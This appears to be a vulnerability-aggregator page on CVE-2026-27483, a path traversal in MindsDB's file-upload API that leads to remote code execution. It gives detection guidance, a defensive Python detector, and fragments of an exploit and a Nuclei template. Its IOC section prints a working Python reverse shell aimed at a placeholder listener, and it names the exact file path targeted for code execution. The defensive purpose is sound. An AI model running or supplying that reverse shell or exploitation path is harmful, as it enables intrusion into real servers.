CVE-2026-27483
Published 2026-02-24
Priority P179 · CVSS 3.1: 8.8 (high)
CVSS 3.1 vector: AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
EXPLOIT
EPSS: 11.11% (95.4th percentile)
MindsDB is a platform for building artificial intelligence from enterprise data. Prior to version 25.9.1.1, there is a path traversal vulnerability in MindsDB's /api/files interface, which an authenticated attacker can exploit to achieve remote command execution. The vulnerability exists in the "Upload File" module, which corresponds to the API endpoint /api/files. Because the multipart file upload does not validate the uploaded file path, an attacker can perform path traversal by using `../` sequences in the filename field. The file write occurs before clear_filename and save_file are called, so neither the filename nor the file type is filtered, allowing arbitrary content to be written to any path on the server. Version 25.9.1.1 patches the issue.
Affected (2 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| mindsdb | mindsdb | < 25.9.1.1 | 25.9.1.1 |
| mindsdb | mindsdb | >= 0 < 25.9.1.1 | 25.9.1.1 |
Detection & IOCs (extracted from sources)
command:
import os,pty,socket
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("{lhost}",{lport}))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
pty.spawn("/bin/sh")
- Detect multipart PUT requests to /api/files/* where the filename field in the Content-Disposition header contains path traversal sequences (../).
- Alert on PUT /api/files requests where the multipart filename parameter resolves to a path outside the intended upload directory, especially targeting Python site-packages (e.g., pip/__init__.py).
- Monitor for a POST to /api/handlers/<handler>/install returning HTTP 500 with a body containing 'Failed to install dependencies' shortly after a suspicious PUT /api/files upload; this two-step sequence is the RCE trigger pattern.
- Flag HTTP 400 responses containing 'Not supported format' from /api/files PUT requests as a successful path-traversal payload upload indicator (the exploit treats this as upload success).
- Insikt Group created a Nuclei template for CVE-2026-27483; defenders can use it to identify vulnerable MindsDB instances (versions >= 25.4.1.0 and < 25.9.1.1).
- Check the /api/status endpoint response for 'mindsdb_version' to fingerprint vulnerable instances; versions matching >= 25.4.1.0 and < 25.9.1.1 are exploitable.
- The path traversal payload specifically targets the Python venv pip package path (venv/lib/python3.10/site-packages/pip/__init__.py) to achieve RCE via handler install; the exact path may vary depending on the server's Python version and venv layout.
- Version 25.9.1.1 patches the issue; the PoC explicitly aborts if the detected version is >= 25.9.1.1.
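The first two detection bullets above, and the description's point that the file write happens before clear_filename and save_file run, can be exercised offline with a small parser. The following is an added example, not MindsDB's code: it parses a constructed multipart PUT to /api/files, flags a Content-Disposition filename that contains traversal segments or that resolves outside an assumed upload root (UPLOAD_DIR is a placeholder path, not MindsDB's real storage location), and shows the basename sanitisation plus containment check that a safe save path performs before opening the file. The helper names (multipart_filenames, has_traversal, resolve_inside, safe_target, analyze_upload, build_request) are mine, not the project's, and the sample requests are constructed, not captured traffic.

```python
"""Added example (not MindsDB code): flag path-traversal filenames in multipart uploads
to /api/files and show the containment check a safe save path performs before writing."""
import os
import re

# Assumed upload root (placeholder): MindsDB's real storage location is not given on the page.
UPLOAD_DIR = "/opt/mindsdb/uploads"
_FILENAME_RE = re.compile(r'filename="((?:[^"\\]|\\.)*)"')


def parse_http_request(raw):
    """Split a raw HTTP/1.1 request into (method, path, lower-cased header dict, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        key, _, value = line.partition(":")
        headers[key.strip().lower()] = value.strip()
    return method, path, headers, body


def multipart_filenames(body, content_type):
    """Minimal multipart/form-data walk: return the Content-Disposition filename of each file part."""
    m = re.search(r'boundary=("?)([^";]+)\1', content_type)
    if not m:
        return []
    delimiter = b"--" + m.group(2).encode()
    names = []
    for chunk in body.split(delimiter)[1:]:
        if chunk.startswith(b"--"):                 # closing delimiter "--boundary--"
            break
        part_head = chunk.partition(b"\r\n\r\n")[0].decode("latin-1")
        for line in part_head.split("\r\n"):
            key, _, value = line.partition(":")
            if key.strip().lower() == "content-disposition":
                fm = _FILENAME_RE.search(value)
                if fm:
                    names.append(fm.group(1))
    return names


def has_traversal(filename):
    """Detection rule: any '..' segment, absolute path or drive letter in the filename."""
    normalized = filename.replace("\\", "/")
    if normalized.startswith("/") or re.match(r"^[A-Za-z]:", normalized):
        return True
    return any(seg == ".." for seg in normalized.split("/"))


def resolve_inside(upload_dir, filename):
    """Containment check: the target must stay under upload_dir, otherwise the write is refused.
    commonpath (not a string prefix test) keeps 'uploads2' from passing as inside 'uploads'."""
    root = os.path.normpath(os.path.abspath(upload_dir))
    candidate = os.path.normpath(os.path.join(root, filename.replace("\\", "/")))
    if candidate == root or os.path.commonpath([root, candidate]) != root:
        raise ValueError(f"refusing to write outside {root}: {candidate}")
    return candidate


def safe_target(upload_dir, filename):
    """Hardened save path: reduce to a sanitised basename first, then apply the containment check."""
    base = os.path.basename(filename.replace("\\", "/"))
    base = re.sub(r"[^A-Za-z0-9._-]", "_", base).lstrip(".")
    if not base:
        raise ValueError("empty filename after sanitisation")
    return resolve_inside(upload_dir, base)


def analyze_upload(raw, upload_dir=UPLOAD_DIR):
    """Detection logic for one raw request: one finding per file part that looks like traversal."""
    method, path, headers, body = parse_http_request(raw)
    if method != "PUT" or not path.startswith("/api/files"):
        return []
    findings = []
    for fname in multipart_filenames(body, headers.get("content-type", "")):
        try:
            resolve_inside(upload_dir, fname)
            escapes = False
        except ValueError:
            escapes = True
        traversal = has_traversal(fname)
        if traversal or escapes:
            findings.append({"path": path, "filename": fname,
                             "traversal_sequence": traversal, "escapes_upload_dir": escapes})
    return findings


def build_request(path, filename, boundary="----Boundary1"):
    """Constructed sample multipart PUT (synthetic input for the detector, not captured traffic)."""
    body = (f"--{boundary}\r\n"
            f'Content-Disposition: form-data; name="file"; filename="{filename}"\r\n'
            "Content-Type: text/plain\r\n\r\nsample content\r\n"
            f"--{boundary}--\r\n").encode()
    head = (f"PUT {path} HTTP/1.1\r\nHost: mindsdb.example.internal\r\n"
            f"Content-Type: multipart/form-data; boundary={boundary}\r\n"
            f"Content-Length: {len(body)}\r\n\r\n").encode()
    return head + body


if __name__ == "__main__":
    for name in ("../../../tmp/demo.txt", "report.csv"):
        print(name, "->", analyze_upload(build_request("/api/files/demo", name)))
```

In a deployment the raw bytes would come from reassembled request bodies at a reverse proxy or WAF rather than from build_request. Two checks are kept separate on purpose: has_traversal is the cheap signature-style rule from the first bullet, while resolve_inside is the semantic check from the second bullet and is also the form a fixed save_file should take, applied before any file handle is opened.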
GHSA
MindsDB: Path Traversal in /api/files Leading to Remote Code Execution
ghsa · 2026-02-24 · HIGH · CWE-22
### Summary
There is a path traversal vulnerability in Mindsdb's /api/files interface, which an authenticated attacker can exploit to achieve remote command execution.
### Details
The vulnerability exists in the "Upload File" module, which corresponds to the API endpoint /api/files. The affected code is located at mindsdb/api/http/namespaces/file.py:
```python
@ns_conf.route("/")
@ns_conf.param("name", "MindsDB's name for file")
class File(Resource):
    @ns_conf.doc("put_file")
    @api_endpoint_metrics('PUT', '/files/file')
    def put(self, name: str):
        """add new file
        params in FormData:
            - file
            - original_file_name [optional]
        """
        data = {}
        mindsdb_file_name = name
        existing_file_names = ca.file_controller.get_files_names()
```
OSV
MindsDB: Path Traversal in /api/files Leading to Remote Code Execution
osv · 2026-02-24 · HIGH
No detection rules found.
Exploit-DB
MindsDB 25.9.1.1 - Path Traversal
exploitdb · 2026-05-04 · CVSS 8.8 · HIGH
```python
# Exploit Title: MindsDB 25.9.1.1 - Path Traversal
# Date: 06-03-2026
# Exploit Author: Lohitya Pushkar (thewhiteh4t)
# Vendor Homepage: https://mindsdb.com/
# Software Link: https://github.com/mindsdb/mindsdb
# Version: not installed handlers

BANNER = """
--- CVE-2026-27483 ------------------
--- MindsDB Path Traversal to RCE ---
[>] Found By : XlabAITeam
[>] PoC By : Lohitya Pushkar (thewhiteh4t)
"""

try:
    parser = argparse.ArgumentParser()
    parser.add_argument("-rh", default="127.0.0.1", help="Target host")
    parser.add_argument("-rp", default="47334", help="Target port")
    parser.add_argument("-lh", help="Listener host")
    parser.add_argument("-lp", default="4444", help="Listener port")
    parser.add_argument("-u", help="Username")
    parser.add_argument("-
```
Nuclei
MindsDB - Remote Code Execution
nuclei · CVSS 8.8 · HIGH
```yaml
          MindsDB = 25.4.1.0", "< 25.9.1.1")'
        condition: and
        internal: true
    - raw:
        - |
          POST /api/login HTTP/1.1
          Host: {{Hostname}}
          Content-Type: application/json

          {"username":"{{username}}","password":"{{password}}"}
      matchers:
        - type: dsl
          dsl:
            - 'status_code == 200 && contains(body, "token")'
            - 'status_code == 400 && contains(body, "Error in username or password")'
          condition: or
          internal: true
      extractors:
        - type: regex
          name: token
          part: body
          group: 1
          regex:
            - '{"token":\s*"([^"]+)"'
          internal: true
    - raw:
        - |
          PUT /api/files/{(unknown)} HTTP/1.1
          Host: {{Hostname}}
          Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryv9dZC0cAHLlHSHD9
          Authorization: Bearer {{token}}
          Connection: close

          ------WebKitFormBoundaryv9dZC0cAHLlHSHD9
          Content-Disposition: form-da
```
Recorded Future
March 2026 CVE Landscape: 31 High-Impact Vulnerabilities Identified, Interlock Ransomware Group Exploits Cisco FMC Zero-Day
blogs_recorded_future · 2026-04-13 · CVSS 9.8 · CRITICAL
In March 2026, Insikt Group® identified 31 high-impact vulnerabilities that should be prioritized for remediation, 29 of which had a Very Critical Recorded Future Risk Score.
These vulnerabilities affected products from the following vendors: Cisco, Microsoft, Google, ConnectWise, Langflow, Citrix, Aquasecurity, Nginx UI, Qualcomm, F5, Craft CMS, Laravel, Apple, Synacor, Wing FTP Server, n8n, Omnissa, SolarWinds, Ivanti, Hikvision, Rockwell, and Broadcom. This month's most affected vendors were Microsoft and Apple, together accounting for approximately 32% of the 31 vulnerabilities.
One vulnerability (CVE-2017-7921, affecting Hikvision) is approximately nine ye
Wiz
CVE-2026-27483 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz · CVSS 8.8 · HIGH

| Field | Value |
|---|---|
| Source | NVD |
| Score | 8.8 (CNA score 8.8) |
| Published | February 24, 2026 |
| Severity | HIGH |
| Affected technologies | Python |
| Has public exploit | Yes |
| Has CISA KEV exploit | No |
| CISA KEV release date | N/A |
| CISA KEV due date | N/A |
| Exploitation probability (EPSS) | 16.3 |
| Exploitation probability percentile (EPSS) | 94.8 |
| Affected packages and libraries | mindsdb (pip), severity HIGH, has fix, added Feb 25, 2026 |